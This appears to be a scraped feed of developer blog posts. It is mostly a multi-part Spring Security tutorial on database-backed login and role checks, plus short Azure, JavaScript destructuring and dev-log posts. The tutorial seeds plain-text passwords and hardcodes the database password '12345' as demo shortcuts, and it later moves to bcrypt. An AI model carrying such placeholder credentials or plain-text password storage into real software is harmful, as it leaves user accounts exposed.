While authentication verifies the identity of a user in an application, authorization determines what actions the user is permitted to perform. This means it addresses the permissions assigned to a user.
In an application, there may be multiple users, each with different levels of operational rights. For example, an ADMIN user may have the right to delete a user, whereas a regular user will not have this capability.
A basic flow of user authentication and authorization
**Authentication**

1. User submits the credentials to the application.
2. The application verifies the credentials by checking in the database.
3. If the credentials are valid allow access to the application.
**Authorization**

1. User requests a resource.
2. The authorization module checks if the user has rights to access the resource.
3. If user has rights the resource is given to the user.
4. Else the access to resource is denied.
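The four steps above amount to looking up the rights a user's role grants and checking membership. A minimal, hypothetical Java sketch (this is not Spring Security's actual API; the names and data are invented for illustration):

```java
import java.util.Map;
import java.util.Set;

public class AuthzSketch {
    // Hypothetical mapping of usernames to the rights their role grants.
    static final Map<String, Set<String>> RIGHTS = Map.of(
        "admin", Set.of("READ", "DELETE_USER"),
        "regular", Set.of("READ")
    );

    // Step 2 of the flow: does this user hold the right the resource requires?
    static boolean mayAccess(String user, String requiredRight) {
        return RIGHTS.getOrDefault(user, Set.of()).contains(requiredRight);
    }

    public static void main(String[] args) {
        System.out.println(mayAccess("admin", "DELETE_USER"));   // true
        System.out.println(mayAccess("regular", "DELETE_USER")); // false
    }
}
```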
### **User details service**
This service provides the necessary data, such as username, password, or other details required for authentication. In Spring Security, we configure a `UserDetailsService` object, which instructs Spring Security on where to load the required data for authentication. For example, when a username is provided as "test@test.com," Spring Security needs to look up the user data where the username is "test@test.com." This lookup is typically performed on a database. The database required for this lookup is configured using the user details service.
In essence, the user details service is a service that retrieves user data from the database based on a given key.
### **Authentication provider**
The authentication provider is responsible for authenticating users based on the provided credentials.
The authentication provider requests the user's details from the user details service using the received username. The user details service fetches and returns the user information if a user with the requested name is found. The authentication provider then compares the supplied password with the stored one.
The authentication provider and the user details service collaborate to authenticate a user effectively.
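Stripped of Spring's interfaces, that collaboration looks roughly like this (all names and data below are hypothetical, for illustration only):

```java
import java.util.HashMap;
import java.util.Map;

public class AuthSketch {
    // Plays the role of the user details service: looks a user up by username.
    static final Map<String, String> USER_STORE = new HashMap<>();
    static {
        USER_STORE.put("test@test.com", "secret");
    }

    static String loadUserByUsername(String username) {
        return USER_STORE.get(username); // the stored password, or null if no such user
    }

    // Plays the role of the authentication provider: fetch the user, then compare passwords.
    static boolean authenticate(String username, String password) {
        String storedPassword = loadUserByUsername(username);
        return storedPassword != null && storedPassword.equals(password);
    }

    public static void main(String[] args) {
        System.out.println(authenticate("test@test.com", "secret")); // true
        System.out.println(authenticate("test@test.com", "wrong"));  // false
    }
}
```

In real Spring Security, `loadUserByUsername` returns a `UserDetails` object rather than a raw password, and the comparison goes through the configured `PasswordEncoder` instead of `equals`.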
https://blog.gintophilip.com/series/spring-security-authentication-and-authorization
--- | bytegrapher |
1,877,475 | Pride Month | This is a submission for Frontend Challenge v24.04.17, CSS Art: June. Inspiration For the... | 0 | 2024-06-06T23:08:18 | https://dev.to/gabrielliosc/pride-month-44a3 | frontendchallenge, devchallenge, css, pride | _This is a submission for [Frontend Challenge v24.04.17](https://dev.to/challenges/frontend-2024-05-29), CSS Art: June._
## Inspiration
For the June frontend challenge, I was inspired by the celebration of diversity, since it's Pride Month.
## Demo


Link to the repository: https://github.com/gabrielliosc/CSS-Art-June
Demo: https://gabrielliosc.github.io/CSS-Art-June/
## Journey
To add the confetti effect I used an open-source library called tsparticles; you can check its code here: https://github.com/tsparticles/tsparticles
The rainbow was really interesting to create; the stripes and animation were challenging. I enjoyed working on this project a lot, and I'm glad to be able to participate in this contest.
### License
MIT License
Copyright (c) 2024 Gabrielli Olvieira
Permission is hereby granted, free of charge, to any person obtaining a copy of this software and associated documentation files (the "Software"), to deal in the Software without restriction, including without limitation the rights to use, copy, modify, merge, publish, distribute, sublicense, and/or sell copies of the Software, and to permit persons to whom the Software is furnished to do so, subject to the following conditions:
The above copyright notice and this permission notice shall be included in all copies or substantial portions of the Software.
THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND, EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE. | gabrielliosc |
893,130 | The Basics of Minikube | What is Minikube? Minikube is a simple to use local virtual environment (and simple shell)... | 0 | 2021-11-09T17:58:24 | https://dev.to/newfront/the-basics-of-minikube-3b8c | kubernetes, tooling, cheatsheet | ## What is Minikube?
[Minikube](https://minikube.sigs.k8s.io/docs/start/) is a simple to use *local virtual environment* (and simple `shell`) that runs a small, dedicated [Kubernetes](https://kubernetes.io/) cluster locally on (Mac/Windows/Linux).

Figure 1-1. Minikube Local Environment
Installation instructions are [available online](https://minikube.sigs.k8s.io/docs/start/), or you can use `brew install minikube`, if you are running on MacOS.
## The Basics
Once installed there are only a small handful of commands needed to operate minikube effectively. The following commands can be run in your terminal of choice.
## minikube start
Simply spins up a local single-node Kubernetes cluster and downloads and installs any additional dependencies on your behalf.
```
minikube start
```
By default, the minikube virtual machine starts up with 2 CPU cores and 2 GB of RAM. There are many options that allow you to customize your installation and specify how the K8s cluster will operate. For example, you can choose the version of K8s, the total memory to allocate to the virtual machine, as well as the number of CPU cores.
**Customizing the Minikube Virtual Machine**
```
minikube start \
--kubernetes-version v1.21.2 \
--memory 16g \
--cpus 4 \
--disk-size 80g
```
When you are ready to stop working, you can choose to keep the virtual machine running and simply `pause` the processes within the k8s cluster, or you can choose to fully `stop` the cluster and reclaim your system resources.
## minikube pause
Pause is a novel concept in minikube. Rather than fully shutting down your cluster, you can choose to pause (freeze) specific resources (governed by namespaces) or pause everything that is running. Pausing specific resources, for example a local Kafka or Redis, can help when you need to see how your applications behave when a service is lost.
Pause all Pods
```
minikube pause -A
```
Pause Specific Pods
```
minikube pause -n kafka,redis
```
## minikube unpause
Any containers paused at a prior point in time can be unpaused.
```
minikube unpause -n kafka,redis
```
Using `pause` and `unpause` can be a life saver if you have limited local system resources. As an added benefit, it gives you a simple mechanism to return to a specific environment setup, much like `docker compose` is used to spin up specific runtime environments as a slice over Docker. Since Kubernetes maintains the state of the processes running within it, minikube simply snapshots things and frees up your cluster resources (within the virtual machine) when you no longer need to run a specific set of Pods and Containers.
## minikube stop
When you decide you want to simply stop everything and shutdown the physical virtual machine just use the stop command.
```
minikube stop
```
That concludes the quick tour of the minikube basics. Come back here if you need to revisit any of the basic commands.
> Note: `minikube delete` can be used to clear everything by deleting the underlying virtual machine. Use this with caution, since any changes made to the underlying K8s node (minikube node) will be wiped out as well.
Enjoy. | newfront |
1,849,842 | Getting Started with SSR | Hey guys, recently, I've been exploring Next.js, a framework built on top of React to... | 23,487 | 2024-06-06T23:00:00 | https://dev.to/devlawrence/getting-started-with-ssr-123j | webdev, nextjs, beginners, javascript | Hey guys, recently, I've been exploring Next.js, a framework built on top of React that streamlines web application development, and I've come across a technique it uses for rendering web pages. It's quite distinct from the familiar client-side rendering (CSR) approach that many of us are accustomed to. This technique is known as Server-Side Rendering (SSR).
In this article, we'll delve into what SSR entails, how it differs from CSR, and uncover other intriguing aspects. Let's dive right in 😉
## What is SSR?
Server-side rendering (SSR) is a technique in web development where the web page is generated on the server before being sent to the user's browser. This means that the initial content of the page is already rendered and ready to be displayed when the user requests it.
Here's a breakdown of SSR in the context of **Next.js:**
- When a user visits a Next.js page by making an HTTP request, the server executes the necessary code to generate the complete HTML content for that page (Next.js also splits code per page by default). This includes the initial data and markup.
- The generated HTML is then sent to the user's browser.
- Once the browser receives the HTML, it can immediately render the content without having to wait for any additional JavaScript to be downloaded and executed.
This approach offers several advantages such as:
- **Improved SEO:** Search engines can easily crawl and index the content of SSR-rendered pages, which can boost your website's search ranking.
- **Faster initial load times:** Since the initial HTML is already generated, users see the content of the page almost instantly, leading to a better perceived performance.
- **Enhanced user experience:** Users don't have to wait for JavaScript to load before they can interact with the page.
So what sets it apart from client-side rendering? They both seem to render right away, right?
## Difference between CSR and SSR
You're correct that both Server-Side Rendering (SSR) and client-side rendering (CSR), the default method in React, can provide an immediate rendering experience for users. However, there's a key difference in when the rendering happens 👇🏽
- In SSR (with Next.js), the server renders the initial HTML on the server, including the data needed for the page. This HTML is then sent to the browser, resulting in a faster initial load time because the content is already there.
- In CSR (normal React), the browser receives an empty HTML shell and then fetches the necessary JavaScript code to render the page content. This can lead to a slight delay before the user sees the content, especially on slower connections.
Here is an analogy to differentiate the two
- Imagine SSR as getting a pre-made meal at a restaurant. You receive your food instantly, and then the chef prepares any additional dishes you ordered.
- On the other hand, CSR is like ordering a custom meal. The chef needs to cook everything from scratch, so it takes a bit longer to get your food.
## Considerations for SSR with Next.js
Here are two additional things to keep in mind about SSR with Next.js
1. **Data fetching:** SSR is great for SEO and initial load times, but it can add some overhead to your server since it needs to generate the HTML for each request. To optimize this, Next.js offers techniques like `getStaticProps` and `getServerSideProps` for fetching data efficiently on the server-side.
2. **Not ideal for highly dynamic content:** SSR is less suitable for web applications with constant updates or user interactions that heavily rely on JavaScript. In these cases, client-side rendering or a hybrid approach might be more appropriate.
## Understanding `getStaticProps` and `getServerSideProps`
In Next.js, `getStaticProps` and `getServerSideProps` are functions specifically designed for data fetching on the server-side, addressing the potential drawbacks of SSR that we talked about earlier. Here's a breakdown of what they are and the difference between them 👇🏽
- **`getStaticProps`:** This is a function that is ideal for pre-rendering data at build time. It's perfect for content that doesn't update frequently, like blog posts or product pages. The fetched data is directly included in the static HTML, resulting in super-fast load times and excellent SEO since search engines can easily index the content. Here is an example 👇🏽
```jsx
function HomePage({ data }) {
return (
<div>
<h1>Home Page</h1>
<p>Data fetched at build time: {data}</p>
</div>
);
}
export async function getStaticProps() {
// Simulate fetching data at build time
const data = "This data was fetched at build time.";
return {
props: {
data,
},
};
}
export default HomePage;
```
Here is what is going on from the code above 👇🏽
- We have a simple home page component (**`HomePage`**) that receives some data as a prop.
- We use **`getStaticProps`** to fetch data at build time. Here, we're simulating fetching data synchronously.
- The fetched data is passed to the **`HomePage`** component as props.
- **`getServerSideProps`:** This is a function that fetches data on the server-side just before a page is rendered for each request. It's a good choice for content that needs to be dynamic or personalized based on the user, like shopping carts or user profiles. While it might add a slight delay compared to `getStaticProps`, it ensures the data is always up-to-date. Here is an example 👇🏽
```jsx
function AboutPage({ data }) {
return (
<div>
<h1>About Page</h1>
<p>Data fetched on each request: {data}</p>
</div>
);
}
export async function getServerSideProps() {
// Simulate fetching data on each request
const data = "This data is fetched on each request.";
return {
props: {
data,
},
};
}
export default AboutPage;
```
Here is what is going on from the code above 👇🏽
- We also have a simple about page component (**`AboutPage`**) that receives some data as a prop.
- We use **`getServerSideProps`** to fetch data on each request. Here, we're simulating fetching data synchronously.
- The fetched data is passed to the **`AboutPage`** component as props.
💡 *I hope you now have a basic idea of how `getStaticProps` and `getServerSideProps` work.*
These examples are quite basic and demonstrate the fundamental usage of **`getStaticProps`** and **`getServerSideProps`**. But in real-world scenarios, you would typically use these functions to fetch data from external sources like APIs or databases.
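To make the build-time vs per-request distinction concrete outside of Next.js, here is a plain Node.js sketch (the function names are illustrative, not the real Next.js API): the "static" variant hands every caller the same data produced once when the module loads, while the "server-side" variant produces fresh data on every call.

```javascript
// Simulates data fetched once, at build time: computed when the module loads.
const buildTimeData = { fetchedAt: Date.now() };

function getStaticPropsSketch() {
  // Every "request" sees the same pre-built data.
  return { props: { data: buildTimeData } };
}

function getServerSidePropsSketch() {
  // A fresh object is produced for each request.
  return { props: { data: { fetchedAt: Date.now() } } };
}

console.log(getStaticPropsSketch().props.data === getStaticPropsSketch().props.data);         // true: shared
console.log(getServerSidePropsSketch().props.data === getServerSidePropsSketch().props.data); // false: fresh each call
```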
## Conclusion
Thank you for reaching the end of the article! 🎉 I hope you found it informative and insightful. If you have any questions or contributions, feel free to leave them in the comments section below. Wishing you an amazing weekend! 😀 | devlawrence |
1,879,728 | Day 965 : Learning | liner notes: Professional : Whew...today. Had a couple of meetings to start off the day. Started... | 0 | 2024-06-06T22:52:56 | https://dev.to/dwane/day-965-learning-c34 | hiphop, code, coding, lifelongdev | _liner notes_:
- Professional : Whew...today. Had a couple of meetings to start off the day. Started working on my project. Took a look at the community board and went down a rabbit hole helping a person. Helped them get it working, but realized the day was basically over.
- Personal : Went through Bandcamp and picked some projects that I'll pick up later. Worked on my side project, looked at some land and went to sleep.

Going to purchase tracks on Bandcamp and put together some social media posts. Oh, and I got the slide show component for my side project "working". Need to do some refinement, but it's working. Think I'm going to do a quick detour to make a demo to explore some technology that I've been learning about and want to use in a future side project. Looks like it's going to rain. Let me get started on my night.
Have a great night!
peace piece
Dwane / conshus
https://dwane.io / https://HIPHOPandCODE.com
{% youtube G8IVcyTNs80 %} | dwane |
1,879,727 | i love gacha :) | gacha #gachalife | 0 | 2024-06-06T22:29:00 | https://dev.to/ilikealanlikeslay/i-love-gacha--4c6d | gacha, gachalife | #gacha #gachalife
 | ilikealanlikeslay |
1,879,726 | Can you really hire a professional hacker to retrieve stolen crypto? Where do you find one? Consult Fastfund Recovery. | Unless you've been living under a virtual rock, you've probably heard about the boom in... | 0 | 2024-06-06T22:28:55 | https://dev.to/george_clinton_b1f10f7156/can-you-really-hire-a-professional-hacker-to-retrieve-stolen-crypto-where-do-you-find-one-consult-fastfund-recovery-32if | webdev, javascript, programming, productivity | Unless you've been living under a virtual rock, you've probably heard about the boom in cryptocurrency, especially Bitcoin. This digital currency has taken the world by storm, offering a decentralized and secure way to transact without intermediaries like banks. With its skyrocketing value and promises of financial autonomy, it's no wonder Bitcoin has attracted millions of investors. But where there's money, thieves lurk in the shadows, ready to pounce on unsuspecting victims. Bitcoin theft has become a pressing issue in the cryptocurrency world, leaving many investors devastated and wondering if there's any hope of recovering their stolen funds. Fortunately, a glimmer of hope shines through the darkness in the form of Fastfund Recovery. Fastfund Recovery is enlightened in the Bitcoin world and can help you recover your stolen Bitcoin. Email: Fastfundrecovery8 (at) gmail dot com
Tele,gram: fastfundsrecovery
Signal: 18075007554 | george_clinton_b1f10f7156 |
1,879,675 | AI Excels in Small Domains | When it comes to AI, the average user often thinks of large language models like ChatGPT or Claude AI... | 0 | 2024-06-06T21:40:44 | https://dev.to/max_prehoda_9cb09ea7c8d07/ai-excels-in-small-domains-50gi | When it comes to AI, the average user often thinks of large language models like ChatGPT or Claude AI that are trained on vast amounts of data across a wide range of domains. While these models are incredibly impressive in their ability to engage in open-ended conversations and tackle a variety of tasks, they can sometimes struggle with hallucinations or inconsistencies when dealing with highly specific or niche topics.
This is where AI trained on smaller, focused domains truly shines. By narrowing the scope of training data to a specific area, such as CSS animations and transitions, AI models can become extremely proficient and efficient at generating accurate and creative solutions within that domain. The limited syntax and well-defined rules of CSS animations make it an ideal candidate for AI specialization.
I recently had the opportunity to put this concept to the test by building an AI model specifically trained on CSS animations and transitions. Initially, I experimented with the Claude API and found that it performed quite well in generating animations. However, the real magic happened when I switched to a self-trained AI model running locally. The results were very impressive.
The locally trained AI model demonstrated an incredible ability to generate complex and visually stunning CSS animations with ease. It had a deep understanding of the syntax, timing functions, and various properties involved in creating smooth and engaging animations. The model's outputs were not only technically accurate but also showcased a level of creativity and innovation that surpassed my expectations.
The new model is going live today @ [aicssanimations.com](https://www.aicssanimations.com/)
Try it out for yourself and feel free to give feedback! | max_prehoda_9cb09ea7c8d07 | |
1,879,685 | Breaking Free from Tutorial Hell: My Journey to Becoming a Web Developer | Hello World! I've been coding, or I should say trying to code, for the past two years. Despite my... | 0 | 2024-06-06T22:15:40 | https://dev.to/aniiketpal/breaking-free-from-tutorial-hell-my-journey-to-becoming-a-web-developer-3889 | webdev, javascript, beginners, productivity | Hello World! I've been coding, or I should say trying to code, for the past two years. Despite my efforts, I still don't know how to make fully functional websites (though I can create simple ones). I've been stuck in what many call "tutorial hell" for a long time. This means I've spent countless hours watching tutorial videos and copying code, only to find myself unable to write the code independently. It has been a frustrating experience, and I've often wondered why I can't seem to progress.
Recently, I've had a realization: the key to learning how to code effectively is to build projects and learn through hands-on experience, rather than just passively watching videos. So, I've decided to restart my coding journey. This time, I'm not starting from scratch because I already have a grasp of the basics. However, my approach will be different. I will primarily rely on documentation to guide me, and I'll turn to YouTube only when absolutely necessary. I won't waste hours watching videos that don't contribute to my understanding.
My goal is to secure a job or internship within the next 4-6 months by creating projects that teach me how to develop scalable products. Through these projects, I hope to gain practical experience and deepen my knowledge. Who knows, I might even end up creating my own SaaS product while working on these projects 😎. Along the way, I will make an effort to share my learnings with the community as much as I can, hoping that my journey can inspire and help others who are in a similar situation. | aniiketpal |
1,879,683 | Saclux Comptech Specialst can come through for you when it comes to Digital Currency recovery | My Name is Julianne, I was devastated when I lost 2 BTC to a phishing scam. But thanks to the... | 0 | 2024-06-06T22:01:32 | https://dev.to/julianne_theresa_c3ffa29c/saclux-comptech-specialst-can-come-through-for-you-when-it-comes-to-digital-currency-recovery-355c | My Name is Julianne,
I was devastated when I lost 2 BTC to a phishing scam. But thanks to the expertise of SACLUX COMPTECH SPECIALST and their team, I was able to recover 95% of my stolen Bitcoin! Their cutting-edge technology and innovative methods made the impossible possible.
If you're a victim of cryptocurrency theft, don't lose hope! I highly recommend talk2us@sacluxcomptechspecialst.com and their team for their exceptional service and expertise in recovering DIGITAL CURRENCY. Their dedication, professionalism, and success rate are unmatched. Don't hesitate to reach out to them for help. They are the real deal! Contact info:
Telegram: SacluxComptechTeam
Website: https://sacluxcomptechspecialst.com/ | julianne_theresa_c3ffa29c | |
1,879,673 | Getting Data from WhoScored: A Web Scraping Project with Selenium | Some time ago, I wrote a post on dev.to about Web Scraping with Python, BeautifulSoup, and Requests.... | 0 | 2024-06-06T22:01:22 | https://dev.to/lisandramelo/obtendo-dados-do-whoscored-projeto-de-web-scraping-com-selenium-4538 | python, selenium, webscraping, beautifulsoup | Some time ago, I wrote a [post on dev.to about Web Scraping with Python, BeautifulSoup, and Requests](https://dev.to/lisandramelo/extracting-data-from-transfermarkt-an-introduction-to-webscraping-2i1c). Although that post provides a foundation for the data scraping process on most websites, in some cases this approach is not enough. Some sites are configured to prevent automated access for data scraping. In general, websites try to keep out bots that can overload their servers and users who might take information and use it without proper credit.
Despite these protections, automation tools can be essential for building automation, testing, and data analysis solutions for web applications. That is why learning about these tools is fundamental for developing, testing, and analyzing websites with anti-crawler protections.
In this tutorial, we will explore how to use Selenium to access and extract data from websites that have more advanced protection mechanisms. Selenium is a browser automation tool that can simulate human interaction with web pages, making it possible to get around some of the restrictions imposed on traditional web scraping scripts.
## Requirements and Library Installation
Before writing the code itself, we need to make sure we have all the necessary tools. So, check that you meet the following requirements:
- [Python installed on your machine](https://www.python.org/downloads/);
- The Selenium library for Python;
- The BeautifulSoup library for Python;
- The Pandas library for Python;
- A browser WebDriver.
### Installing the Required Tools
#### Installing Selenium
The Selenium library for Python is a tool for automating interactions with web browsers. Selenium lets you write Python scripts that perform actions in a browser, such as clicking buttons, filling out forms, navigating between pages, and extracting data from sites with anti-crawler protections.
To install the [Selenium](https://pypi.org/project/selenium/) library, you can use [pip](https://pypi.org/project/pip/).
```bash
pip install selenium
```
#### Installing BeautifulSoup
The BeautifulSoup library is a tool for extracting data from HTML and XML files. It makes navigating, searching, and modifying HTML and XML documents simple and effective.
To install the [BeautifulSoup](https://pypi.org/project/beautifulsoup4/) library, you can also use [pip](https://pypi.org/project/pip/).
```bash
pip install beautifulsoup4
```
#### Installing Pandas
The Pandas library offers high-performance data structures and functions for data manipulation, making data analysis and data science workflows more efficient and intuitive.
To install the [Pandas](https://pypi.org/project/pandas/) library, you can also use [pip](https://pypi.org/project/pip/).
```bash
pip install pandas
```
#### Downloading a WebDriver
Selenium uses WebDrivers to carry out its automation tasks. A WebDriver is a tool used to automate tests in web browsers. It lets developers and testers control a browser (such as Chrome, Firefox, or Safari) programmatically, simulating the interaction of a real user. One of the most popular WebDrivers is the Selenium WebDriver, which supports several browsers and programming languages, such as Python, Java, and C#.
[ChromeDriver](https://developer.chrome.com/docs/chromedriver?hl=pt-br) is the Selenium WebDriver component that makes it possible to control the Google Chrome browser. It acts as a bridge between the Selenium WebDriver and the browser, allowing automated tests to run in Chrome.
To download the tool, go to the [Chrome for Testing downloads page](https://googlechromelabs.github.io/chrome-for-testing/) and select the chromedriver version compatible with your operating system.

*Available Stable ChromeDriver Versions*
After downloading the corresponding compressed file, extract it and note the location of the chromedriver.exe file, as it will be used later.
## Implementation
The first step in implementing our project is importing the libraries we will use. To do so, use the following code snippet, which imports BeautifulSoup, the Selenium library, and the Pandas library.
```python
from bs4 import BeautifulSoup
from selenium.webdriver.chrome.service import Service
from selenium import webdriver
import pandas as pd
```
With the libraries imported, we can configure our web driver to access pages on the internet. For this configuration, the [Selenium WebDriver](https://www.selenium.dev/documentation/webdriver/browsers/chrome/) constructor needs a [Service](https://www.selenium.dev/documentation/webdriver/drivers/service/), which is used to configure and manage the WebDriver service for Chrome, such as specifying the path to the ChromeDriver executable and setting additional arguments, plus options for the Chrome browser instance. So, in the snippet below, we configure and instantiate the object responsible for fetching and manipulating the page.
```python
chrome_options = webdriver.chrome.options.Options()
chrome_driver = "path/to/file/chromedriver.exe"
service_to_pass = Service(executable_path=chrome_driver)
wd = webdriver.Chrome(service=service_to_pass, options=chrome_options)
```
Now we will perform the action needed to get data from the page we want. For that, we use the [get()](https://www.selenium.dev/documentation/webdriver/interactions/navigation/) method of the object we created, which is responsible for opening the website. Then we use the WebDriver property [page_source](https://selenium-python.readthedocs.io/api.html#selenium.webdriver.remote.webdriver.WebDriver.page_source), which gives us access to the source code (content) of the page in question.
We also need to determine the address of the page we want to access. In this project I used the website [www.whoscored.com](https://www.whoscored.com/), specifically its [statistics](https://www.whoscored.com/Statistics) page. This website has anti-crawler protection, so using it as a test lets us see how effective the tool is.

*Página Acessada no Tutorial*
```python
URL_BASE = "https://www.whoscored.com/Statistics"
wd.get(URL_BASE)
soup_file = wd.page_source
```
After this snippet, we can access the entire HTML code of the web page. We can use this information for tests, analyses, or any transformations we need. We can also use the WebDriver to fill out forms, click buttons, or navigate between pages. For this project, I will only clean the unstructured information on the page and transform it into structured data.
For that, we will use the Pandas and BeautifulSoup libraries imported earlier. If you have trouble following the code below, I recommend my [Introduction to Web Scraping](https://dev.to/lisandramelo/recebendo-informacoes-do-transfermarkt-uma-introducao-ao-web-scraping-188o) tutorial, since it introduces each of the functions used here.
The first step of the processing is to run the source code through BeautifulSoup's HTML parser.
```python
soup_page = BeautifulSoup(soup_file, "html.parser")
```
Now we will look for the data we want. In this project, we will get data from the table highlighted below: summarized data for the 20 best clubs according to the ratings assigned by the site.
![Image of the table to be accessed](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/aibe2r0yers0ipvyi5b3.png)
*Table to be Accessed*
First, we access the chosen table in the HTML by its ID.
```python
main_table = soup_page.find('div', {'id': 'top-team-stats-summary'})
team_sum_stats_table = main_table.find('table', {'id': 'top-team-stats-summary-grid'})
```
Now, within the table, we get the existing column names.
```python
team_sum_stats_header = team_sum_stats_table.find_all('th')
header_columns = [column_name.text for column_name in team_sum_stats_header]
```
Note that the code above uses a [List Comprehension](https://www.w3schools.com/python/python_lists_comprehension.asp). This feature provides a cleaner, simpler syntax for creating lists from other lists. The code above is therefore equivalent to the one proposed below.
```python
team_sum_stats_header = team_sum_stats_table.find_all('th')
header_columns = []
for column_name in team_sum_stats_header:
    header_columns.append(column_name.text)
```
Now, let's get the cell data from our table. To do so, use the code below.
```python
team_sum_stats_body = team_sum_stats_table.find('tbody').find_all('tr')
teams_stats = [[cell_value.text for cell_value in row.find_all('td')] for row in team_sum_stats_body]
```
This time, the code has two nested list comprehensions. It may look complex, but in reality it does the same thing as the code below.
```python
teams_stats = []
for row in team_sum_stats_body:
    cells = row.find_all('td')
    row_values = []
    for cell_value in cells:
        row_values.append(cell_value.text)
    teams_stats.append(row_values)
```
We now have our columns and our rows of values, so we can create a DataFrame with the structured information that was on the site. To do so, use the code below.
```python
df_sum = pd.DataFrame(teams_stats, columns=header_columns)
print(df_sum.head())
```
The code will output the first five records of the site's table, as in the image below.
![Image with the result of our code](https://dev-to-uploads.s3.amazonaws.com/uploads/articles/8mhw6xr3tyfl1nacmyc1.png)
*Result of Our Code*
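Since the scraped cells arrive as plain strings, a natural next step is converting numeric columns so they can be sorted or aggregated. Here is a minimal sketch with pandas (the column names and values below are illustrative, not the site's actual headers):

```python
import pandas as pd

# Toy frame mimicking scraped text data
df = pd.DataFrame({"Team": ["Inter", "Real Madrid"], "Rating": ["6.94", "6.91"]})
# errors="coerce" turns unparseable cells into NaN instead of raising
df["Rating"] = pd.to_numeric(df["Rating"], errors="coerce")
print(df["Rating"].mean())
```

The same idea applies to any numeric column extracted with the code above.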
## Repository
The complete project code is in my [GitHub repository](https://github.com/veronicamars73/Getting-WhoScored-Data).
## Final Thoughts
I hope this tutorial helps in some way. I encourage you to implement your own versions, and I am happy to help however I can.
Feel free to reach out via e-mail at [lisandramelo34@gmail.com](mailto:lisandramelo34@gmail.com) or on [LinkedIn](https://www.linkedin.com/in/melo-lisandra).

*Author: lisandramelo*
# Resilis: Global Low Latency APIs
*Published 2024-06-06 at https://dev.to/resilis/resilis-global-low-latency-apis-7l1*

Optimizing API performance for low latency and cost-effectiveness is critical in ensuring a seamless user experience and maximizing operational efficiency. While traditional methods like centralized caching and database optimizations are effective, they can become complex and expensive with user growth. Resilis addresses this challenge by using edge optimization and caching strategies to optimize API performance. You can think of this as a globally distributed reverse proxy strategy or simply as a CDN for real-time data. With over 300 global edge locations, Resilis improves API performance and security by processing requests closer to users.
Resilis offers a comprehensive edge-based solution that guarantees fast and cost-effective API performance, delivering a secure, globally low-latency experience with enhanced DDoS attack protection. It also provides real-time insights and location-specific performance monitoring, along with mutation-based cache invalidation for handling dynamic API data. Resilis also features simple integration with Open API and Postman collections.
Additionally, Resilis incorporates [asynchronous request processing](https://resilis.io/docs/concepts/asynchronous-requests). This method effectively handles high-traffic scenarios for appropriate write requests, keeping response times fast and further reducing costs by optimizing server use under heavy loads.
## When and Why You Need Resilis
1. **Handling Traffic Surges:** Ensures fast and cost-effective API performance during peak traffic times, preventing slowdowns and crashes.
2. **High-Traffic API Optimization:** Delivers low latency and cost savings for systems with heavy API usage, improving user experience.
3. **Speedy Content Delivery:** Accelerates and reduces the cost of API calls in content management systems, enhancing content distribution.
4. **Location-Aware Performance Monitoring:** Provides real-time insights into API performance based on location, ensuring optimal performance for users across different regions. The edge-based architecture enables accurate and efficient monitoring.
5. **Robust Security and DDoS Protection:** Implements advanced security measures and DDoS protection to safeguard API endpoints and infrastructure, ensuring uninterrupted service and data integrity. Performance monitoring includes security metrics to detect and mitigate potential threats.
6. **Blockchain Data Access:** Resilis optimizes access to immutable blockchain transaction data through efficient caching, reducing latency and network load for blockchain companies.
## Use Cases
Let’s examine these two unique scenarios:
**Business A**:
You run a large e-commerce online retail store, and your major sales events (Black Friday, discount sales, etc.) are approaching. During these peak times, your API will need to handle three to ten times the normal request load. To avoid server crashes, slow processing times, and reduced conversion rates due to a sluggish website, your API must be highly performant and responsive.
A poor user experience can have significant negative impacts on your business. Server crashes can lead to extended downtime, making your site inaccessible and causing potential revenue loss. Slow processing times frustrate users, leading to abandoned carts and a decline in customer satisfaction. Lower conversion rates can occur because customers are less likely to complete purchases on a slow or unresponsive site. In the competitive landscape of online retail, especially during high-stakes sales events, any delay or technical issue can drive customers to competitors.
**Business B**:
You have an app that enables forex traders to place trades and access liquidity pools and other financial market features. Events and occasions drive traffic to applications like this, resulting in peak hours in the API request chart. Unlike the sales day in the previous use case, these events are not anticipated. You will need battle-tested technology that handles unexpected peak hours for your application when they are least expected, and that is where Resilis comes in.
In both scenarios, Resilis balances your app requests across edge servers in all relevant regions, delivering faster responses, readily available data, and reduced API call costs, providing a seamless experience even during peak traffic. This ensures that your customers enjoy a fast, reliable shopping experience, maximizing your sales opportunities and customer satisfaction.
## How to Setup with Resilis
Currently, we support importing your OpenAPI specifications or your Postman Collection to Resilis, and our technology will automatically engineer your API to give optimal results with edge technology.
We have made these detailed and simple guides for you to follow while setting up Resilis:
- [Postman Setup Guide](https://resilis.io/docs/guides/setup-with-postman)
- [OpenAPI Setup Guide](https://resilis.io/docs/guides/setup-with-openapi)
### [Join our public beta](https://app.resilis.io)

*Author: samuelagm*
# Gopherizing some puppeteer code
*Published 2024-06-06 at https://artur.wtf/blog/using-go-chromedp/ (tags: go, scraping, chrome, automation)*

## Why?
As developers we sometimes get a bad case of the shiny new object syndrome. I hate to say it but every time I start hacking on something new, the urge to add something new is quite overwhelming. It is really tough to keep an interest in projects for a long time and it starts to become tedious the deeper you go into the weeds. I suppose this is why people list `growth` as one of their top motivations.
I consider that anything new is an opportunity for growth, and doing something over and over in a similar manner quickly becomes tedious. I've been building various types of scrapers since 2011, and it all started because I wanted to automate a workflow and save myself some time. The time spent on automating it was probably more than if I had done the work by hand, but it was interesting interacting via `http` from code and crunching the data automatically.
The amount of data on the web is pretty crazy, you have various sources and multiple types of data that can be combined in very interesting ways. Back in those days dropshipping was becoming huge and people were performing arbitrage across Amazon/Ebay/local flea-markets etc.. Tools that were able to perform analytics across these shops were quite trendy, and the market was slightly less crowded, so for me building crawlers seemed like a nice idea to build out a good customer base.
Nowadays due to `RAG` systems, gathering data automatically, breaking it down and feeding it into embedding models and storing it in vector databases for `LLM` information enhancement has come back into the spotlight. In between then and now there have been a few changes in the way data is served up for consumption. Off the top of my head:
